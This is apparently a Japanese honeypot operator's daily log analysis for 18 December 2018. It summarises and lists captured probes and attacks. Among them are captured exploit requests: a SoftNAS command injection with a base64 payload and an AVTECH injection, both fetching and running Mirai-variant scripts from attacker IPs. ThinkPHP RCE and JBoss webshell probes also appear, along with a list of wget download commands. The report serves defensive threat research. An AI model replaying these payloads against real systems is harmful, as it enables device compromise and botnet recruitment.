ハニーポットのログ分析(2018/12/18)
WOWhoneypotの2018/12/18(火)(運用195日目)の簡易分析です。
本日の総アクセス件数は 408件です。
本日の主なアクセスは以下です。
・phpのWebShell設置の調査:193件
・phpMyAdminの調査:82件
・ThinkPHPの脆弱性を突いた攻撃:22件
・Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:10件
・Tomcat管理ページへのブルートフォース攻撃:9件
・JBossに対する調査:7件
・AVTECHの脆弱性を突くMirai亜種の攻撃(User-Agent: Dark):1件
・(新規)SoftNASの脆弱性(CVE-2018-14417)を突いた攻撃:1件
→「GET /softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+d2dldCBodHRwOi8vMTQ1LjIzOS4xMzguNjkvc29mdG5hcy5zaCAtTyBqd2Q7Y2htb2QgNzc3IGp3ZDsuL2p3ZA==++base64+-d++sudo+bash;」
以下よりOSコマンドインジェクションを狙ったものと思われます。
https://www.secureauth.com/labs/advisories/softnas-cloud-os-command-injection
コマンド部分のbase64はデコードすると「wget hxxp://145.239.138[.]69/softnas.sh -O jwd;chmod 777 jwd;./jwd」となります。
取得するものはMiraiの亜種のDDoSツールをインストールするためのシェルスクリプトと思われます。
https://urlscan.io/result/44484f1f-37d2-4172-95ba-6f781f5e3011/
ただし、現時点では既にアクセスできません。
本日のドメイン名でのアクセスは以下です。
4 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
1 2018-12-18 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 2018-12-18 wget -c hxxp://wap.tfddos[.]net:57843/linux
1 2018-12-18 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 2018-12-18 wget -c hxxp://59.47.72[.]190:1111/qw1
1 2018-12-18 wget -c hxxp://103.55.13[.]68:13333/systems
1 2018-12-18 wget -c hxxp://103.55.13[.]68:13333/sshk
1 2018-12-18 wget hxxp://209.141.33[.]119/avtechsh
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 66 | 2018-12-18 | アクセス | GET / |
| 10 | 2018-12-18 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 9 | 2018-12-18 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 4 | 2018-12-18 | phpのWebShell設置の調査 | POST /xx.php |
| 4 | 2018-12-18 | phpのWebShell設置の調査 | POST /qq.php |
| 4 | 2018-12-18 | phpのWebShell設置の調査 | POST /q.php |
| 4 | 2018-12-18 | phpのWebShell設置の調査 | GET /shell.php |
| 4 | 2018-12-18 | phpのWebShell設置の調査 | GET /cmd.php |
| 3 | 2018-12-18 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 3 | 2018-12-18 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 3 | 2018-12-18 | ThinkPHPの脆弱性を突いた攻撃 | GET /thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 3 | 2018-12-18 | ThinkPHPの脆弱性を突いた攻撃 | GET /thinkphp/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 3 | 2018-12-18 | ThinkPHPの脆弱性を突いた攻撃 | GET /html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 2 | 2018-12-18 | IISの脆弱性(CVE-2017-7269)を突く攻撃 | PROPFIND / |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /zuoshou.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /zuo.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /yao.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /xw.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /xw1.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /xshell.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /xiao.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /wshell.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /w.php |
| 2 | 2018-12-18 | WordPressの調査 | POST /wp-admins.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /weixiao.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /webslee.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /system.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /s.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /sheep.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /qaq.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /phpStudy.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /phpstudy.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /mz.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /mx.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /m.php?pbid=open |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /lindex.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /l8.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /l7.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /hm.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /defect.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /db_session.init.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /db__.init.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /db_desql.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /db_dataml.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /conflg.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /cmd.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /cainiao.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /aotu.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /ak48.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /ak47.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /9678.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | POST /56.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /z.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /x.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /www/phpMyAdmin/index.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /wpo.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /wpc.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /wp-config.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /web/phpMyAdmin/index.php |
| 2 | 2018-12-18 | WebDAVの調査 | GET /webdav/ |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /uploader.php |
| 2 | 2018-12-18 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /tools/phpMyAdmin/index.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /text.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /test.php |
| 2 | 2018-12-18 | ThinkPHPの脆弱性を突いた攻撃 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /pmd_online.php |
| 2 | 2018-12-18 | PHPWetherMapの調査 | GET /plugins/weathermap/editor.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/db___.init.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadmin/scripts/db___.init.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin/phpMyAdmin/index.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin/index.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /muhstiks.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /muhstik-dpr.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /muhstik2.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /lol.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /logon.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /license.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /lala.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /lala-dpr.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /knal.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /java.php |
| 2 | 2018-12-18 | ThinkPHPの脆弱性を突いた攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /htdocs.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /help.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /help-e.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /hell.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /desktop.ini.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /db_pma.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /db_cts.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /cmx.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /cmv.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /cmdd.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /claroline/phpMyAdmin/index.php |
| 2 | 2018-12-18 | PHPWetherMapの調査 | GET /cacti/plugins/weathermap/editor.php |
| 2 | 2018-12-18 | phpのWebShell設置の調査 | GET /appserv.php |
| 2 | 2018-12-18 | phpMyAdminの調査 | GET /admin/phpMyAdmin/index.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /zuos.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /zuoindex.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /zshmindex.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /yumo.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /xz.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /wuwu11.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /wc.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /wan.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /wanan.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /tomcat.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /tiandi.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /ssaa.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /sean.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /qwe.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /post.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /pe.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /ou2.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /min.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /miao.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /linuxse.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /l6.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /ip.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /infoo.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /hh.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /help.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /h1.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /feixiang.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /default.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /db.init.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /ceshi.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /bak.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /aw.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /app.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /ak.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /aaaa.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /9510.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /3.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /12.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | POST /1213.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | GET /xmlrpc.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /xampp/phpmyadmin/index.php |
| 1 | 2018-12-18 | PHPWetherMapの調査 | GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /v/index.php |
| 1 | 2018-12-18 | SoftNASの脆弱性(CVE-2018-14417)を突いた攻撃 | GET /softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+d2dldCBodHRwOi8vMTQ1LjIzOS4xMzguNjkvc29mdG5hcy5zaCAtTyBqd2Q7Y2htb2QgNzc3IGp3ZDsuL2p3ZA==++base64+-d++sudo+bash; |
| 1 | 2018-12-18 | PHPWetherMapの調査 | GET /shopdb/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /shaAdmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /scripts/setup.php |
| 1 | 2018-12-18 | クローリング | GET /robots.txt |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | GET /_query.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /pwd/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /program/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /pmd/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /pma-old/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /pmamy/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /pmamy2/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /PMA/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /pma/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /PMA2/index.php |
| 1 | 2018-12-18 | PHPWetherMapの調査 | GET /phppma/index.php |
| 1 | 2018-12-18 | PHPWetherMapの調査 | GET /phpmy/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmion/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadmin/phpmyadmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdminold/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin.old/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadmin-old/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin+++---/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin__/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyadmin_bak/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmina/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin-4.4.0/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadmin2/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin1/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadmin1/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAdmin123/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadmin0/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadmin |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyadmi/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpmyadm1n/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpMyAbmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpma/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpAdmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /phpadmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /mysql/sqlmanager/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /mysql/mysqlmanager/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /mysql/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /mysql/dbadmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /mysqladmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /mysql/admin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /mysql-admin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /mysql_admin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /MyAdmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /myadmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /myadmin2/index.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | GET /muhstik.php |
| 1 | 2018-12-18 | phpのWebShell設置の調査 | GET /log.php |
| 1 | 2018-12-18 | JBossに対する調査 | GET /jexws4/jexws4.jsp?ppp=echo%20Hello%20D3c3mb3r |
| 1 | 2018-12-18 | JBossに対する調査 | GET /jexws2/jexws2.jsp?ppp=echo%20Hello%20D3c3mb3r |
| 1 | 2018-12-18 | JBossに対する調査 | GET /jexsw2/jexsw2.jsp?ppp=echo%20Hello%20D3c3mb3r |
| 1 | 2018-12-18 | JBossに対する調査 | GET /jexinv4/jexinv4.jsp?ppp=echo%20Hello%20D3c3mb3r |
| 1 | 2018-12-18 | JBossに対する調査 | GET /jexinv3/jexinv3.jsp?ppp=echo%20Hello%20D3c3mb3r |
| 1 | 2018-12-18 | JBossに対する調査 | GET /jbossass/jbossass.jsp?ppp=echo%20Hello%20D3c3mb3r |
| 1 | 2018-12-18 | ThinkPHPの脆弱性を突いた攻撃 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /index.php |
| 1 | 2018-12-18 | 不正中継の調査 | GET hxxp://112.35.88.28:10083/index.php |
| 1 | 2018-12-18 | 不正中継の調査 | GET hxxp://112.35.63.31:10083/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /db/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /dbadmin/index.php |
| 1 | 2018-12-18 | JBossに対する調査 | GET /console/jspzxc.jsp?cmd=echo%20Hello%20D3c3mb3r |
| 1 | 2018-12-18 | AVTECHの脆弱性を突くMirai亜種の攻撃 | GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /admin/PMA/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /admin/pma/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /admin/phpmyadmin/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /admin/mysql/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /admin/mysql2/index.php |
| 1 | 2018-12-18 | phpMyAdminの調査 | GET /admin/index.php |
以上です。
